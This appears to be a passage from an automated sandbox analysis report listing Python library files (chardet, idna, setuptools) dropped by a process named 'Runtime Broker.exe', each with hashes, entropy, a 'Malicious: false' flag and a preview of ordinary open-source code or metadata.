MD5:	FBA3594136BBE9B5A77B29EA3A214F7B
SHA1:	66E0B9BD502D1A6F43C47F80A3A2C07DCEFB14E9
SHA-256:	A69A0A3862FD38F763F40E025321BC478F336E75EDF4C37559778261EA5AEAC7
SHA-512:	553337DA40E7EB5F61B0F7662F6E582D53C77BD59DC84CEC4F5648DA3FCA6AE3A02BD5D9FDDB76EC866B593EEB95A00A6B548C2D84D7D035D9EC08FCE07A353C
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..THAI_LANG_MODEL = {. 5: { # '.'. 5: 2, # '.'. 30: 2, # '.'. 24: 2, # '.'. 8: 2, # '.'. 26: 2, # '.'. 52: 0, # '.'. 34: 1, # '.'. 51: 1, # '.'. 47: 0, # '.'. 58: 3, # '.'. 57: 2, # '.'. 49: 0, # '.'. 53: 0, # '.'. 55: 0, # '.'. 43: 2, # '.'. 20: 2, # '.'. 19: 3, # '.'. 44: 0, # '.'. 14: 2, # '.'. 48: 0, # '.'. 3: 2, # '.'. 17: 1, # '.'. 25: 2, # '.'. 39: 1, # '.'. 62: 1, # '.'. 31: 1, # '.'. 54: 0, # '.'. 45: 1, # '.'. 9: 2, # '.'. 16: 1, # '.'. 2: 3, # '.'. 61: 2, # '.'. 15: 3, # '.'. 12:

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\langturkishmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	95934
Entropy (8bit):	3.0460970701807786
Encrypted:	false
SSDEEP:	192:lsaLEatMa6ca66a7DSpuFbbY9VMJuXaa+a1HaZiiviPaDxiPNn+0iyKaA0i47aWR:TbU/4Ye0FbPIGwu3DDJa9XpTTu
MD5:	84E009A6C34C6ECAA39D96F48DD12365
SHA1:	0FB32965A1D35867F116A2212F827532A7E1A653
SHA-256:	1F795D89C23FAE196FD2BDD5169556B542FA5F7D16CB9F7ABFBFD81F3DAC11D8
SHA-512:	76BC6993ACEA7E0D5720AC36137F6AF42A376D5959BE932A3C9FC636A3BF3D986E6ACDB731B6B615D389A99BF771D3D06D947BB4457B71A9285236CA704955BF
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from chardet.sbcharsetprober import SingleByteCharSetModel...# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..TURKISH_LANG_MODEL = {. 23: { # 'A'. 23: 0, # 'A'. 37: 0, # 'B'. 47: 0, # 'C'. 39: 0, # 'D'. 29: 0, # 'E'. 52: 0, # 'F'. 36: 0, # 'G'. 45: 0, # 'H'. 53: 0, # 'I'. 60: 0, # 'J'. 16: 0, # 'K'. 49: 0, # 'L'. 20: 0, # 'M'. 46: 0, # 'N'. 42: 0, # 'O'. 48: 0, # 'P'. 44: 0, # 'R'. 35: 0, # 'S'. 31: 0, # 'T'. 51: 0, # 'U'. 38: 0, # 'V'. 62: 0, # 'W'. 43: 0, # 'Y'. 56: 0, # 'Z'. 1: 3, # 'a'. 21: 0, # 'b'. 28: 0, # 'c'. 12: 2, # 'd'. 2: 3, # 'e'. 18: 0, # 'f'. 27: 1, # 'g'. 25: 1, # 'h'. 3: 1, # 'i'. 24: 0, # 'j'. 10: 2, # 'k'. 5: 1, # 'l'. 1

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\latin1prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5370
Entropy (8bit):	4.724145544254619
Encrypted:	false
SSDEEP:	96:Ptzcu4I3PIXMmmmmmOmmmmmmJmmmmmmcmJxBeEJbchy18IuIB+N5:Ptzcu46xBJCxD5
MD5:	4EC6FE5DA8DDBED7AA355DF81BD0E6AF
SHA1:	18AAFA5D34C519C51823A7A4737DD07F79E11DB9
SHA-256:	4B6228391845937F451053A54855AD815C9B4623FA87B0652E574755C94D914F
SHA-512:	F8608DD1F72AFA5355F10F343A69002D80A5287D6968BDB3C9A3493816179E3E8FE265453DE51ADA7F69BDA3549A3545C45E6136B8BD6A9D36F52E77351F84A5
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\mbcharsetprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3413
Entropy (8bit):	4.691758401653377
Encrypted:	false
SSDEEP:	48:Px/zeL0uwyUjHSU0JMB/0dQ5Wn7c6H5RNMVyylElKBq8CdTIIbu:Ptz/u4GJMB2n7c6HtQyylEl+bCdTIIbu
MD5:	D7BB9DEC5E8045651A957E956E6CFDC7
SHA1:	EEB555BEF8B05F40C0AA6D81BF2B323B875FC653
SHA-256:	011F797851FDBEEA927EF2D064DF8BE628DE6B6E4D3810A85EAC3CB393BDC4B4
SHA-512:	1790596D9A6E1ADA7EBE3D103793445B1EE2393E9CD0964E39BCE5B023CB49F0D387F17F9E8B88BBDBF5F27E183058896EEABB93465ABFCBEB359131E32A9BA4
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\mbcsgroupprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2012
Entropy (8bit):	4.937443894092934
Encrypted:	false
SSDEEP:	48:Px/zeL0uwyUjHSP+cWg/bBkPmJsB8acnd+:Ptz/u4MJsBrod+
MD5:	D11B219F9A5CC6B48D492BEB69C3D9C3
SHA1:	9E6D7D608F78DD6AE8D09BFC9D46E41C7F287BB1
SHA-256:	87A4D19E762AD8EC46D56743E493B2C5C755A67EDD1B4ABEBC1F275ABE666E1E
SHA-512:	C0DD5DDC5EDF0BE6E3595A033B050AE8FC2471B805D2295CA7FE01C1F5F6CA005D047A34E8FE047EF682FAB75D8762DE7BAB05D8F4E4359E012ED65F327628EF
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\mbcssm.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	25481
Entropy (8bit):	4.703644928512803
Encrypted:	false
SSDEEP:	192:Kt17u4PJ9G///8/eeeeeHN999999jyTMG/96U////////9eeeeeeeea/99///99M:6u42f17JlwxjpFhHJ
MD5:	3084C6E597BB859E0CDF091E046C9D5E
SHA1:	0501C978D8B4BDB0883F06F604139896AA3634BD
SHA-256:	498DF6C15205DC7CDC8D8DC1684B29CBD99EB5B3522B120807444A3E7EED8E92
SHA-512:	CD72A229BDAD4CAC29334326BF5B2DF59B3551D0591E2794668CF9BA194C2B1301CDD781F904F6CE8561A0A4ABE339A8AEDBF0676914CFA9D433770ED7F7DE3B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\metadata\languages.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	19474
Entropy (8bit):	4.309626912869515
Encrypted:	false
SSDEEP:	192:otWEL1HNmxATvSK9WwT+X5cdAW4ak4CWD79vACb8sPWvI6QaIeIKl0v48m1wv+am:J/kz97MMveFwpgijRRC
MD5:	F4A09F07D24ADF6500AC136A5F9AE48F
SHA1:	4BEBA4DE69BAB37063E4D564AB9FE9B58BB316E5
SHA-256:	E35B4BAB778B4AB0446C455542954616AF4AEE8D659FD6F51E9635974842510A
SHA-512:	E85987753AF4641FB3D6D2431A2FE78DBC8695922C5A56FA3AE689A04683073D2E690C969EA7661E7ECC1FB3971FE31721BCF372346056366426707C0680C256
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --.""".Metadata about languages used by our model training code for our.SingleByteCharSetProbers. Could be used for other things in the future...This code is based on the language metadata from the uchardet project..""".from __future__ import absolute_import, print_function..from string import ascii_letters...# TODO: Add Ukranian (KOI8-U)..class Language(object):. """Metadata about a language useful for training models.. :ivar name: The human name for the language, in English.. :type name: str. :ivar iso_code: 2-letter ISO 639-1 if possible, 3-letter ISO code otherwise,. or use another catalog as a last resort.. :type iso_code: str. :ivar use_ascii: Whether or not ASCII letters should be included in trained. models.. :type use_ascii: bool. :ivar charsets: The charsets we want to support and create data for.. :type charsets: list of str. :ivar alphabet: The characters in the

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\sbcharsetprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6136
Entropy (8bit):	4.546497348315648
Encrypted:	false
SSDEEP:	96:Ptzcu4ySB1JHv2+18JlyLpX8895vzCIIgR:Ptzcu4vB7nLm8veK
MD5:	2EBB3D6952540FEA5F8D131376001203
SHA1:	06BB9EA3B9D4E4A3949EF6FDE06C9385FB2A8509
SHA-256:	9E6C8CCAEC731BCEC337A2B7464D8C53324B30B47AF4CAD6A5D9C7CCEC155304
SHA-512:	353B5F18B8F2E7C5387E800996A12997825C5381A73DE3F14134A15BC3353957759782B8915191593ACAB680E6714F7A1080D4CF513A621B903E966F164DA3BD
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\sbcsgroupprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4309
Entropy (8bit):	4.956208949275685
Encrypted:	false
SSDEEP:	96:Ptzcu4h5jCXCvEXNtLRTbSmJs5JKTFSKqlSiMqIBx7lO1F19d:Ptzcu4h5G4MNtLRTOyBTFSKqlSiMqIBm
MD5:	7E03B10FB4702C16B9E88D5CBC11ADA5
SHA1:	723635EC45B1DBDE8C60BC5D10992E6CC9A1FC6A
SHA-256:	86A79F42E5E6885C83040ACE8EE8C7EA177A5855E5383D64582B310E18F1E557
SHA-512:	9237CE3F5270961339EB6AE8C96014832DB2614A3C921939884927EF7420A2BA881DC3F45FFCDB9FB2CB30AA5FDA8A689F96094A2E9EC2CA5A7AD3408050C0AC
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\sjisprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3774
Entropy (8bit):	4.692886314249317
Encrypted:	false
SSDEEP:	96:Kt17u4Mp2KY6HtQyylEl+ii/m98jWTIIRpB:Kt17u4MsKY6ieTz
MD5:	49A4BAE5A91B2CDF3E86CCBE5C891978
SHA1:	AC5FA06EF33A62E12D3F676223F2BA443410AD08
SHA-256:	208B7E9598F4589A8AE2B9946732993F8189944F0A504B45615B98F7A7A4E4C4
SHA-512:	EA7A9B2EEED35A999302D3B3721A8766417BCCA52EEED47025FD634647EB2E0311C74845CCD331303867956294BAD4B288840D88BCE562FD33BDDFD7130E29B1
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\universaldetector.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	12503
Entropy (8bit):	4.482453581698848
Encrypted:	false
SSDEEP:	192:Ptzcu4QKIAlBCWcu77VT4/SqUvhPvD2o8utlH+f0uTbDYr:mu43LjV5vhnRLtxuHDu
MD5:	35875D1D3B0AA5BA1C9CA0F4EB462F4F
SHA1:	5ADB8B49698EC14F762292A97AB110670BCA4D7D
SHA-256:	0E96535C25F49D41D7C6443DB2BE06671181FE1BDE67A856B77B8CF7872058AB
SHA-512:	CC2E4C7059B10685294D1360DA403D2E645AD829DDE1BFE2C0AEFA29EA7C5438D7E272D83D2A99B414A1BB175C8BED489DCD45E1469A7C1FDAFBA763778369C4
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\utf8prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	4.833784610060913
Encrypted:	false
SSDEEP:	48:Kx/1ef0uwyUjHSUr/J0/dD2bbIQ6H5RZvMalElKTYtIIJs:Kt17u4R/J0uIQ6Hh9lElLtIIq
MD5:	E6180774C6437E9A396353411EDDCB36
SHA1:	35EF3BB735C68E457746E85E7C410CEB2ADA711A
SHA-256:	21D0FCBF7CD63AC07C38B8B23E2FB2FDFAB08A9445C55F4D73578A04B4AE204C
SHA-512:	77510EBF5AA4A8AB8CDA47A44D538E453F9BFE0A0332094A753CB7DF84DDDA9BB03757D609F9A1809898611F938F5553EEC370197BDEF9182629F2F4FD9250DF
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\chardet\version.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	242
Entropy (8bit):	4.9466079118032145
Encrypted:	false
SSDEEP:	6:2EJMHUYLQBHmZvDDntuFFeHNDdESzQPXqMC42VUQF6fIX:8HYGZvVuaXE7vqMUHMIX
MD5:	635CDDE23A2245E469D2C0557BA7A938
SHA1:	3B960A058E546F057A0F7F389D14BB1A63E78190
SHA-256:	0380882C501DF0C4551B51E85CFA78E622BD44B956C95EF76B512DC04F13BE7F
SHA-512:	937F00D9761BF3F181B99C6CAFEED49C20C9FF14B653F900B9E8A841CE26C2F92E469F0F1C788A9DDD3851A26F05AFC6E619E7A0FF09F9B0B22E3286ED44577E
Malicious:	false
Preview:	""".This module exists only to simplify retrieving the version number of chardet.from within setup.py and from chardet subpackages...:author: Dan Blanchard (dan.blanchard@gmail.com)."""..__version__ = "4.0.0".VERSION = __version__.split('.').

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\distutils-precedence.pth Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	152
Entropy (8bit):	4.926892830610143
Encrypted:	false
SSDEEP:	3:JSxYEVoC2gxAxCKKFuGA0jpSHEBnJyY0MePAoSoKBW6BMW2y+C1e5k:aYEVo10AxCKeuXypcAnJyYPNB96W2y+C
MD5:	C39367750A2AD85B290FA7595D4CC457
SHA1:	4E2B7B413113994E4730EFE03E564A84CEBE2D73
SHA-256:	7EA7FFEF3FE2A117EE12C68ED6553617F0D7FD2F0590257C25C484959A3B7373
SHA-512:	40E5B4813F24601AD581C93FA0115454EF89E61F6B911644E3B89946280FF97CBD46AE00287D8DC71392EF6C940EBAA173D2E3C32DF72F0AA27D65ED73FE37C1
Malicious:	false
Preview:	import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'stdlib') == 'local'; enabled and __import__('_distutils_hack').add_shim(); .

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\easy_install.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.423690747345368
Encrypted:	false
SSDEEP:	3:uZeUlILx3CFRLhAj5EMCrXKhRYLKfhb6MLWgLuBcN:uwVLoFAjajWh9b6KWgYU
MD5:	97B52FE7253BF4683F9F626F015EB72E
SHA1:	AACB1800C66DF9D4AA19B5527563421737F73020
SHA-256:	3030BDBEDE40C43B175F9A9C2A5073D939D6E93A6EBFF0286E77E1089F57DCF3
SHA-512:	2B44DEB5DC5F9DA7A2DC42E97D264F462A3D4B19088B399A4C09F2E6E9720BB6AC19A394E69D3A218264B4A4B1BE462DC0FC6DBB2C8C4A8A7A3C753434FFB3D4
Malicious:	false
Preview:	"""Run the EasyInstall command"""..if __name__ == '__main__':. from setuptools.command.easy_install import main. main().

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna-2.10.dist-info\INSTALLER Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna-2.10.dist-info\LICENSE.rst Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1565
Entropy (8bit):	5.106624399698215
Encrypted:	false
SSDEEP:	48:ZMOorYJYirYJd9dad432sGa3tErmf3toTRv:ZVorYJYirYJd6K313t7uTJ
MD5:	CF36C8682CC154D2D4AA57BD6246B9A1
SHA1:	213659E517DCB5A6963A0B7869CB1BE625FCA442
SHA-256:	412014420D2473DBA06117C3D4D9E0EECAA6DDE0CA30CD951F4EC2BE39426F32
SHA-512:	180DFF753D79BDC31A88275CCA4E2941AB58409CBE2E27B59ECAB85A72263A1E1C077B79360D5A85316B138798783CF3AEA500C3F045BF034EA1D5E4BB87FC27
Malicious:	false
Preview:	License.-------..License: bsd-3-clause..Copyright (c) 2013-2020, Kim Davies. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..#. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...#. Redistributions in binary form must reproduce the above. copyright notice, this list of conditions and the following. disclaimer in the documentation and/or other materials provided with. the distribution...#. Neither the name of the copyright holder nor the names of the . contributors may be used to endorse or promote products derived . from this software without specific prior written permission...#. THIS SOFTWARE IS PROVIDED BY THE CONTRIBUTORS "AS IS" AND ANY. EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE. IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR. PU

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna-2.10.dist-info\METADATA Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	9104
Entropy (8bit):	5.217430851150806
Encrypted:	false
SSDEEP:	192:AzX0ZCbsauJGCX3KQgYiVIXqCcFA7GDK0sk3Z16gMwIr7:A7nsa0G83XiVIbcC7GDps+16gMj3
MD5:	51DA414B478154A813A45661F368B771
SHA1:	BE0C42B22C62C6BA6F8DCA6BCDF591767224F979
SHA-256:	65609A4030637664AFC79114EC2BFA3910BEF4D510EA75E1D5E5F1DFCC927B8D
SHA-512:	6F966C5E483D2A362D8D357926D26700E6229735DE041F54F2FFE9A09BB6993FF824159EE7FEDAC335A4EDCFC90EF3212A3A82735702CE556B301585E9CBFBC5
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: idna.Version: 2.10.Summary: Internationalized Domain Names in Applications (IDNA).Home-page: https://github.com/kjd/idna.Author: Kim Davies.Author-email: kim@cynosure.com.au.License: BSD-like.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Intended Audience :: System Administrators.Classifier: License :: OSI Approved :: BSD License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.4.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: Implementation :: CPytho

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna-2.10.dist-info\RECORD Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.799913926559083
Encrypted:	false
SSDEEP:	24:pn/2zDIvRw0YV+L18flW6MQ/wZdlIqAMySAxRyBrSJU+vTM8rpo8/mlXi:pnuXI5wxV+pilWZQYI+cUK4kpX/V
MD5:	93E3010E4D5BEB73F61DE2CE48EE2DB9
SHA1:	159C6178DB2E5803913D6D5702A15885FB618B86
SHA-256:	3D2EBC6596664BACAFC20F294D701FB501EABAC2548E630A422EF9B4518896D4
SHA-512:	FFE2D9A4407F52C1FD278601D59EBDACBBAC348F00963644F7ADD5D03B7C34D4059BF74E4C489476C6218AC1C6C17EE3C9E479E3CD5665BA73E9E474486C4356
Malicious:	false
Preview:	idna-2.10.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..idna-2.10.dist-info/LICENSE.rst,sha256=QSAUQg0kc9ugYRfD1Nng7sqm3eDKMM2VH07CvjlCbzI,1565..idna-2.10.dist-info/METADATA,sha256=ZWCaQDBjdmSvx5EU7Cv6ORC-9NUQ6nXh1eXx38ySe40,9104..idna-2.10.dist-info/RECORD,,..idna-2.10.dist-info/WHEEL,sha256=8zNYZbwQSXoB9IfXOjPfeNwvAsALAjffgk27FqvCWbo,110..idna-2.10.dist-info/top_level.txt,sha256=jSag9sEDqvSPftxOQy-ABfGV_RSy7oFh4zZJpODV8k0,5..idna/__init__.py,sha256=9Nt7xpyet3DmOrPUGooDdAwmHZZu1qUAy2EaJ93kGiQ,58..idna/__pycache__/__init__.cpython-37.pyc,,..idna/__pycache__/codec.cpython-37.pyc,,..idna/__pycache__/compat.cpython-37.pyc,,..idna/__pycache__/core.cpython-37.pyc,,..idna/__pycache__/idnadata.cpython-37.pyc,,..idna/__pycache__/intranges.cpython-37.pyc,,..idna/__pycache__/package_data.cpython-37.pyc,,..idna/__pycache__/uts46data.cpython-37.pyc,,..idna/codec.py,sha256=lvYb7yu7PhAqFaAIAdWcwgaWI2UmgseUua-1c0AsG0A,3299..idna/compat.py,sha256=R-h29D-6mrnJzbXxymrWUW7iZUv

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna-2.10.dist-info\WHEEL Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.810105929829005
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVin3hP+tPCCf7irO5S:RtBMwlVi3hWBBwt
MD5:	E810E49A07579615336DFE1362445C07
SHA1:	7C415D7E52F9507D6414824277CFAE91AB5006E7
SHA-256:	F3335865BC10497A01F487D73A33DF78DC2F02C00B0237DF824DBB16ABC259BA
SHA-512:	3422782BB6F30F4CFFC8BA0648F4A18B2A942A602D7F2676C04402B1549B34E50C1F5F5CD12FC495D08A9C0DB82FB78503CA075BC2479F9519960A0F044B1F09
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.33.6).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\idna-2.10.dist-info\top_level.txt Download File
